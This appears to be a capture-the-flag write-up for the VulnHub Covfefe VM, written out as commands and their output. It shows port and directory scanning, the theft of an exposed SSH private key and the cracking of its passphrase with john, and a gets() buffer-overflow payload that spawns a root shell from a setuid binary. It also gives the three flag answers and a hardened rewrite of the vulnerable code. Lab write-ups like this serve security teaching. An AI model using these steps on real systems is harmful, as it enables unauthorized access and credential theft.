Target VM: https://www.vulnhub.com/entry/covfefe-1,199/
Goal: capture 3 flags
Note: the target IP changes partway through because I kept moving between locations; it is not a typo.
1. Host discovery
nmap -sP 192.168.31.0/24 |grep 192.168.31 |awk '{print($5)}'
Target IP found: 192.168.31.128
2. Port and service discovery
nmap -A -Pn -p1-65535 192.168.31.128
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 d06a10e0fb6322be09960b716a60ad1a (RSA)
| 256 ac2c111ee2d626ea58c43e2d3e1edd96 (ECDSA)
|_ 256 13b3dbc5af62c2b1607d2f48efc313fc (ED25519)
80/tcp open http nginx 1.10.3
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.3
31337/tcp open http Werkzeug httpd 0.11.15 (Python 3.5.3)
|_http-title: 404 Not Found
| http-robots.txt: 3 disallowed entries
|_/.bashrc /.profile /taxes
|_http-server-header: Werkzeug/0.11.15 Python/3.5.3
MAC Address: 00:0C:29:43:A1:BB (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Browsing to ports 80 and 31337 and viewing the page source turned up nothing.
3. Directory scanning
Port 22
Try logging in as root
The authenticity of host '192.168.31.128 (192.168.31.128)' can't be established.
ED25519 key fingerprint is SHA256:PSAUFRI+B3Kr1fbN9Nm3bV/ObPLCnoE6lKs9zCaeGdM.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.31.128' (ED25519) to the list of known hosts.
root@192.168.31.128: Permission denied (publickey).
The message says access was denied for the publickey method, i.e. the server only accepts key-based authentication, so password guessing is not an option here.
Port 80
Nothing could be found on port 80.
Port 31337
---- Scanning URL: http://192.168.31.128:31337/ ----
+ http://192.168.31.128:31337/.bash_history (CODE:200|SIZE:19)
+ http://192.168.31.128:31337/.bashrc (CODE:200|SIZE:3526)
+ http://192.168.31.128:31337/.profile (CODE:200|SIZE:675)
+ http://192.168.31.128:31337/.ssh (CODE:200|SIZE:43)
+ http://192.168.31.128:31337/robots.txt (CODE:200|SIZE:70)
*robots.txt
Look at robots.txt directly (.bashrc and .profile are shell environment files and usually hold nothing useful)
User-agent: *
Disallow: /.bashrc
Disallow: /.profile
Disallow: /taxes
robots.txt reveals /taxes; visiting it gives flag1
Good job! Here is a flag: flag1{make_america_great_again}
.ssh
Requesting /.ssh returns a directory listing
['id_rsa', 'authorized_keys', 'id_rsa.pub']
What the files are:
id_rsa: SSH private key
authorized_keys: the public keys the server accepts for login
id_rsa.pub: SSH public key
Download id_rsa and authorized_keys
The comment at the end of authorized_keys shows the key belongs to the user simon
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDzG6cWl499ZGW0PV+tRaOLguT8+lso8zbSLCzgiBYkX/xnoZx0fneSfi93gdh4ynVjs2sgZ2HaRWA05EGR7e3IetSP53NTxk5QrLHEGZQFLId3QMMi74ebGBpPkKg/QzwRxCrKgqL1b2+EYz68Y9InRAZoq8wYTLdoUVa2wOiJv0PfrlQ4e9nh29J7yPgXmVAsy5ZvmpBp5FL76y1lUblGUuftCfddh2IahevizLlVipuSQGFqRZOdA5xnxbsNO4QbFUhjIlA5RrAs814LuA9t2CiAzHXxjsVW8/R/eD8K22TO7XEQscQjaSl/R4Cr1kNtUwCljpmpjt/Q4DJmExOR simon@covfefe
4. SSH
Try connecting as simon with the downloaded private key
ssh simon@192.168.31.128 -i id_rsa
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
simon@192.168.31.128: Permission denied (publickey).
The error is a file permission problem (the private key must not be accessible by other users), and the key is also protected by a passphrase
Set the minimum permissions needed (100). Mode 100 leaves no read bit at all, which only works because the operator here is root; the usual setting for a private key is 600.
chmod 100 id_rsa
Crack the private key passphrase
cd /usr/share/john/ # directory holding john's helper scripts
python ssh2john.py /root/id_rsa > /root/john_rsa # convert the private key into a hash file that john can load
john john_rsa # crack the passphrase (result: starwars)
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
starwars (/root/id_rsa)
1g 0:00:00:00 DONE 2/3 (2023-02-16 09:49) 9.090g/s 175727p/s 175727c/s 175727C/s sniper..sunrise
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Connect again as simon with the private key, enter the passphrase, and the SSH login succeeds
ssh simon@192.168.31.128 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
5. Internal enumeration
Privilege enumeration
We are the simon user and do not have root privileges
simon@covfefe:~$ whoami
simon
simon@covfefe:~$ pwd
/home/simon
simon@covfefe:~$ id
uid=1000(simon) gid=1000(simon) groups=1000(simon),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
Checking /etc/passwd shows that the root account is enabled with a login shell
simon@covfefe:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
simon:x:1000:1000:,,,:/home/simon:/bin/bash
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
File enumeration
simon's home directory
http_server.py contains the flag1 we already found; the other files are of little use. The script also explains the earlier findings: static_folder=root serves simon's entire home directory over port 31337, including .ssh, which is why the private key could be downloaded.
simon@covfefe:~$ ls -al
total 36
drwxr-xr-x 3 simon simon 4096 Jul 9 2017 .
drwxr-xr-x 3 root root 4096 Jun 28 2017 ..
-rw------- 1 simon simon 237 Feb 16 18:18 .bash_history
-rw-r--r-- 1 simon simon 220 Jun 28 2017 .bash_logout
-rw-r--r-- 1 simon simon 3526 Jun 28 2017 .bashrc
-rwxr-xr-x 1 simon simon 449 Jul 9 2017 http_server.py
-rw-r--r-- 1 simon simon 675 Jun 28 2017 .profile
-rw-r--r-- 1 simon simon 70 Jul 9 2017 robots.txt
drwx------ 2 simon simon 4096 Jun 28 2017 .ssh
simon@covfefe:~$ cat http_server.py
#!/usr/bin/env python3
from flask import Flask
from os import environ, listdir

root = environ['HOME']
sauce = '/.ssh'
app = Flask(__name__, static_folder=root, static_url_path='')

@app.route(sauce)
def sauce_content():
    return str(listdir(root + sauce)), 200

@app.route('/taxes/')
def taxes_content():
    return 'Good job! Here is a flag: flag1{make_america_great_again}'

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=31337)
*root's home directory
Surprisingly, root's home directory is accessible
simon@covfefe:~$ cd /root/
simon@covfefe:/root$ ls -al
total 24
drwxr-xr-x 2 root root 4096 Jul 9 2017 .
drwxr-xr-x 21 root root 4096 Jun 28 2017 ..
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw------- 1 root root 75 Jul 9 2017 flag.txt
-rw-r--r-- 1 root root 148 Aug 18 2015 .profile
-rw-r--r-- 1 root root 767 Jul 9 2017 read_message.c
As the simon user, flag.txt is not readable, so privilege escalation is needed
-rw------- 1 root root 75 Jul 9 2017 flag.txt
Reading read_message.c gives flag2 and a pleasant surprise. It is a C program with a textbook stack buffer overflow that can be used for privilege escalation: gets() reads into char buf[20] with no length limit, so input longer than 20 characters spills into the adjacent program[] array and whatever follows the 20th character becomes the path that gets executed; and !strncmp(authorized, buf, 5) only compares the first five characters of the input.
flag2{use_the_source_luke}
simon@covfefe:/root$ cat read_message.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>  /* strncmp */
#include <unistd.h>

// You're getting close! Here's another flag:
// flag2{use_the_source_luke}

int main(int argc, char *argv[]) {
    char program[] = "/usr/local/sbin/message";
    char buf[20];
    char authorized[] = "Simon";

    printf("What is your name?\n");
    gets(buf);

    // Only compare first five chars to save precious cycles:
    if (!strncmp(authorized, buf, 5)) {
        printf("Hello %s! Here is your message:\n\n", buf);
        // This is safe as the user can't mess with the binary location:
        execve(program, NULL, NULL);
    } else {
        printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
        exit(EXIT_FAILURE);
    }
}
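As an added example (not the VM's code), here is a hardened rewrite of the name check from read_message.c: a bounded read with fgets that rejects an overlong line instead of letting it spill into the neighbouring array, and a whole-string comparison instead of strncmp on five bytes. check_input() is a test driver that feeds a constructed line through the same logic; the program path should likewise live in read-only storage rather than a stack array next to buf.

```c
/* Hardened replacement for the input handling in read_message.c (added example,
 * not the VM's code): bounded read with fgets, overlong lines rejected, and a
 * whole-name comparison instead of strncmp on the first five bytes. */
#include <stdio.h>
#include <string.h>

#define NAME_BUF 20

/* Read one line into buf (size n) and strip the newline. Returns 0 on success,
 * -1 on EOF or if the line exceeds n-2 characters: overlong input is rejected
 * outright rather than silently truncated or written past the buffer. */
int read_name(char *buf, size_t n, FILE *in) {
    if (fgets(buf, (int)n, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 0;
    }
    int c; /* no newline seen: the line did not fit, drain the rest and reject */
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;
    return -1;
}

/* Compare the whole name; strncmp(..., 5) let "SimonAnything" through. */
int is_authorized(const char *name) {
    return strcmp(name, "Simon") == 0;
}

/* Test driver: run the check over a constructed line held in a temp file.
 * Returns 1 only for a line that fits the buffer and matches exactly. */
int check_input(const char *input) {
    char buf[NAME_BUF];
    FILE *in = tmpfile();
    if (in == NULL)
        return 0;
    fputs(input, in);
    rewind(in);
    int ok = read_name(buf, sizeof buf, in) == 0 && is_authorized(buf);
    fclose(in);
    return ok;
}
```

With this version the 20-byte padding plus shell path used later on this page is rejected before any comparison happens, and "Simonsays" no longer passes as "Simon".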
Finding the executable binary
Since simon cannot compile and run read_message.c himself, search for a binary built from it that simon is allowed to execute, i.e. setuid files
simon@covfefe:/root$ find / -perm -4000 2> /dev/null
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/local/bin/read_message
/bin/umount
/bin/su
/bin/mount
/bin/ping
Check /usr/local/bin/read_message: it is owned by root with the setuid bit set (rws), so simon can run it and it executes with root's effective UID
simon@covfefe:/root$ ls -l /usr/local/bin/read_message
-rwsr-xr-x 1 root staff 7608 Jul 2 2017 /usr/local/bin/read_message
6. Privilege escalation
Running read_message asks for a name and expects Simon
simon@covfefe:/root$ /usr/local/bin/read_message
What is your name?
K
Sorry K, you're not Simon! The Internet Police have been informed of this violation.
List the available shells
simon@covfefe:/root$ cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
Combining this with the earlier review of read_message.c, build the input below: "Simon" plus 15 padding characters fill the 20-byte buffer, and the shell path that follows overwrites the program path (try the shells from /etc/shells one at a time)
SimonXXXXXXXXXXXXXXX/bin/sh
simon@covfefe:/root$ /usr/local/bin/read_message
What is your name?
SimonXXXXXXXXXXXXXXX/bin/sh
Hello SimonXXXXXXXXXXXXXXX/bin/sh! Here is your message:
# whoami
root
# pwd
/root
# id
uid=1000(simon) gid=1000(simon) euid=0(root) groups=1000(simon),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
Recalling the earlier enumeration, read flag.txt in /root/ for the final flag
# cat flag.txt
You did it! Congratulations, here's the final flag:
flag3{das_bof_meister}
With that the box is done, game over OVO